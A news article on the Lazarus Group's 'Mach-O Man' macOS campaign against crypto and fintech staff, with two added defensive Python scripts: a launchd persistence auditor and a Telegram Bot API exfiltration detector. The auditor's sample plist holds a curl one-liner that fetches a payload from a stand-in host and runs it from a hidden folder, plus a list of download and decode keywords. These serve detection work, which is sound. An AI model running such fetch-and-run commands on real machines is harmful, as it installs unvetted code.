Key Highlights
- Lazarus Group is running a macOS-focused cyber campaign called “Mach-O Man,” targeting crypto and fintech workers.
- The attack uses social engineering to trick users into running a Terminal command that installs malware to steal private information.
- The group has stolen billions in crypto over the years and continues to use more advanced methods like this campaign.
A senior blockchain security researcher at CertiK reportedly said that North Korea’s Lazarus Group is running a new macOS-focused campaign called “Mach-O Man.”
According to the report, the campaign targets macOS users working at crypto, fintech, and other high-value companies.
How the “Mach-O Man” campaign works
Security analysis firm ANY.RUN provided a detailed review of the attack. The campaign usually starts on Telegram. A victim receives what looks like a normal meeting invite, often from someone they already know or trust, because the sender’s account has been compromised.
The message then tells the victim to join a meeting on platforms like Zoom, Microsoft Teams, or Google Meet. After clicking, they are sent to a fake support page that says there is a problem with joining the meeting. The page then asks the user to copy and paste a command into macOS Terminal to fix the issue. This is the key step used to install the malware.
Once the command runs, a first-stage loader is activated. It downloads a fake macOS application that looks like regular software and relies on built-in system tools, so it appears “trusted” to macOS security checks; that helps it avoid being blocked by basic protections and makes it harder for users to notice anything wrong.
Inside the malware system
According to ANY.RUN, the malware package is built using Go-based Mach-O binaries and is split into several parts. One component acts as a stager that launches the infection process. Another part collects system information from the device, including the computer name, operating system version, CPU details, network setup, running programs, and browser extensions.
It also checks popular browsers, including Chrome, Safari, Firefox, Brave, Opera, and Vivaldi. All this data is packed together and sent back to the attackers over Telegram.
Another module handles persistence. It hides files in system folders and registers with the macOS startup mechanisms, so it runs every time the computer is turned on; a restart does not remove the malware.
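The persistence behaviour described above (a job that runs at login and points at a binary hidden in a system or user folder) is something a defender can audit directly in the launchd property lists macOS reads at startup. The following script is an added example for this article, not code from ANY.RUN or CertiK: the sample plists are constructed, the paths and labels in them are invented, and the heuristics (hidden path components, temp-directory staging, shell one-liners that fetch or decode before running, Apple-style labels in a user-writable LaunchAgents folder) are an assumption about what is worth flagging, not indicators taken from the campaign.

```python
"""Audit macOS launchd plists for persistence entries of the kind the article
describes. Added example for this article, not code from ANY.RUN or CertiK;
sample plists are constructed and the heuristics are assumptions."""

import plistlib
from pathlib import PurePosixPath

SHELLS = ("/bin/sh", "/bin/bash", "/bin/zsh")
# World-writable staging locations a loader can drop a payload into.
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/Shared/")
# Tokens that, inside a `sh -c` one-liner, suggest fetch-or-decode-then-run behaviour.
DOWNLOAD_HINTS = ("curl ", "wget ", "base64 ", "osascript")

# Constructed samples keyed by the path launchd would load them from (all invented).
SAMPLE_PLISTS = {
    "/Users/alice/Library/LaunchAgents/com.example.syncagent.plist": {
        "Label": "com.example.syncagent",
        "ProgramArguments": ["/Applications/SyncAgent.app/Contents/MacOS/syncagent", "--background"],
        "RunAtLoad": True,
    },
    "/Users/alice/Library/LaunchAgents/com.apple.updatehelper.plist": {
        "Label": "com.apple.updatehelper",  # Apple-style label in a user-writable directory
        "ProgramArguments": ["/bin/sh", "-c",
                             "curl -fsSL https://updates.example.invalid/h -o ~/.local/.cache/helper "
                             "&& ~/.local/.cache/helper"],
        "RunAtLoad": True,
        "KeepAlive": True,
    },
    "/Library/LaunchDaemons/com.example.telemetry.plist": {
        "Label": "com.example.telemetry",
        "Program": "/private/tmp/.sys/telemetryd",
        "RunAtLoad": True,
    },
}


def path_tokens(args):
    """Yield every whitespace-separated token that looks like a path, including
    those buried inside a `sh -c "..."` string."""
    for arg in args:
        for tok in arg.split():
            if "/" in tok:
                yield tok


def has_hidden_component(path: str) -> bool:
    """True if any directory or file name in the path starts with a dot."""
    return any(part.startswith(".") for part in PurePosixPath(path).parts if part != "..")


def audit_plist(plist_path: str, data: bytes) -> list[str]:
    """Return human-readable findings for one launchd plist (empty list = clean)."""
    job = plistlib.loads(data)
    args = list(job.get("ProgramArguments", []))
    program = job.get("Program") or (args[0] if args else "")
    label = job.get("Label", "")
    findings = []

    hidden = [t for t in path_tokens([program, *args]) if has_hidden_component(t)]
    if hidden:
        findings.append(f"hidden directory in program path: {hidden[0]}")
    if program.startswith(STAGING_DIRS):
        findings.append(f"program staged in temporary directory: {program}")
    if program in SHELLS and "-c" in args:
        one_liner = " ".join(args[args.index("-c") + 1:])
        if any(h in one_liner for h in DOWNLOAD_HINTS):
            findings.append("shell one-liner that downloads or decodes before running")
    if label.startswith("com.apple.") and plist_path.startswith("/Users/"):
        findings.append(f"Apple-style label in user LaunchAgents: {label}")
    # Only report the start-up trigger when something else already looks wrong.
    if findings and (job.get("RunAtLoad") or job.get("KeepAlive")):
        findings.append("job runs at login (RunAtLoad/KeepAlive)")
    return findings


def audit_all() -> dict[str, list[str]]:
    """Serialise each constructed sample to plist bytes and audit it as if read from disk."""
    return {path: audit_plist(path, plistlib.dumps(job)) for path, job in SAMPLE_PLISTS.items()}


if __name__ == "__main__":
    for path, findings in audit_all().items():
        print(path, "->", findings or "clean")
```

On a real host the same `audit_plist` function can be fed the bytes of each file under `~/Library/LaunchAgents`, `/Library/LaunchAgents` and `/Library/LaunchDaemons`; the heuristics are deliberately loose and should be tuned against the legitimate agents installed on your fleet before being used as an alerting rule.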
A final module focuses on stealing sensitive data, including browser cookies, stored login details, and macOS Keychain information. The stolen data is packed into archive files and sent to attackers using Telegram bot infrastructure.
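Because the article attributes both the reconnaissance upload and the final theft to Telegram bot infrastructure, one practical detection is to alert on any process other than a known Telegram client that opens a connection to the Bot API host, weighting the alert when the binary lives in a hidden directory or the upload is large. The script below is an added example for this article, not code from ANY.RUN or CertiK; the JSON-lines event format, the client allow-list, the size threshold and the events themselves are constructed assumptions.

```python
"""Flag outbound connections to the Telegram Bot API from processes that are
not a Telegram client. Added example for this article, not code from ANY.RUN
or CertiK; event format, allow-list and sample events are constructed."""

import json
from pathlib import PurePosixPath

# Host that serves the Bot API (assumption: a desktop chat client has no need for it).
BOT_API_HOSTS = ("api.telegram.org",)
# Bundle paths treated as legitimate clients (assumption: adjust to what your fleet installs).
ALLOWED_CLIENT_PREFIXES = ("/Applications/Telegram.app/",)
# Cookie and keychain archives are far larger than a chat message (threshold is an assumption).
LARGE_UPLOAD_BYTES = 1_000_000

# Constructed JSON-lines network events in the shape an EDR export might use.
SAMPLE_EVENTS = """
{"ts": "2025-06-01T09:12:01Z", "pid": 412, "process_path": "/Applications/Telegram.app/Contents/MacOS/Telegram", "dest_host": "api.telegram.org", "dest_port": 443, "bytes_out": 2048}
{"ts": "2025-06-01T09:14:33Z", "pid": 987, "process_path": "/Users/alice/.local/.cache/helper", "dest_host": "api.telegram.org", "dest_port": 443, "bytes_out": 4500000}
{"ts": "2025-06-01T09:15:02Z", "pid": 1001, "process_path": "/usr/bin/curl", "dest_host": "api.telegram.org", "dest_port": 443, "bytes_out": 900}
{"ts": "2025-06-01T09:16:40Z", "pid": 1100, "process_path": "/Applications/Safari.app/Contents/MacOS/Safari", "dest_host": "www.example.com", "dest_port": 443, "bytes_out": 51200}
"""


def in_hidden_dir(path: str) -> bool:
    """True if any component of the process path starts with a dot."""
    return any(part.startswith(".") for part in PurePosixPath(path).parts)


def flag_telegram_exfil(jsonl: str) -> list[dict]:
    """Return one alert per event in which a non-client process talks to the Bot API."""
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if not ev.get("dest_host", "").endswith(BOT_API_HOSTS):
            continue
        proc = ev.get("process_path", "")
        if proc.startswith(ALLOWED_CLIENT_PREFIXES):
            continue
        reasons = ["non-client process contacting Telegram Bot API"]
        if in_hidden_dir(proc):
            reasons.append("process binary lives in a hidden directory")
        if ev.get("bytes_out", 0) >= LARGE_UPLOAD_BYTES:
            reasons.append(f"large upload ({ev['bytes_out']} bytes)")
        alerts.append({"ts": ev["ts"], "pid": ev["pid"], "process_path": proc, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in flag_telegram_exfil(SAMPLE_EVENTS):
        print(alert["ts"], alert["pid"], alert["process_path"], "; ".join(alert["reasons"]))
```

TLS hides the Bot API path and token, so the rule keys on destination host and originating process rather than URL contents; in an environment where Telegram is not sanctioned at all, the allow-list can simply be emptied and every hit treated as worth a look.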
Security researchers also noted that the malware includes cleanup features that attempt to remove traces after stealing data. Some parts of the code are poorly built, and there are mistakes like exposed bot tokens, but it still works because users are tricked into running the commands themselves.
Why security measures matter
The risk for crypto and fintech firms is high. If one computer is infected, attackers may gain access to wallet seed phrases, exchange API keys, internal admin tools, and company systems. From there, they can move deeper into networks or carry out unauthorized transactions.
Lazarus Group has been linked to multiple large-scale crypto attacks over the years. The group has stolen billions of dollars in digital assets since 2017, using a mix of hacking, social engineering, and long-term infiltration tactics.
Recently, the group was linked to an exploit on KelpDAO, in which they stole about $290 million, and to the Bybit exchange exploit. In fact, the group had, in total, taken about $7.3 billion from crypto firms in the last four years.
The group also uses methods beyond direct hacking, including fake identities and insider access, to infiltrate organizations over time before executing attacks.
